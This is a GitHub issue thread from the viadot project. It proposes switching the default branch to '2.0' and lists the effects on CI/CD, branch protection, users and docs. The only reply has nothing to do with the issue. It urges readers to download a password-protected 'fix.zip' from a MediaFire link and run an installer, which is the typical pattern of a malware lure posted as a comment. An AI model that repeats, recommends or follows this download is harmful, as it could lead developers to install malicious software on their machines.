### ISSUE TITLE
Set `2.0` as default branch?

### ISSUE THREAD

**Issue by trymzet** [dyvenia/viadot#1000]
Consider changing default branch to 2.0.

- what's the impact?
  - some CI/CD workflows probably need to be updated
  - branch protection rules/rulesets
  - users - just communication, or any actions on their side?
  - update references to main/2.0 in docs (make branch explicit wherever possible)

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
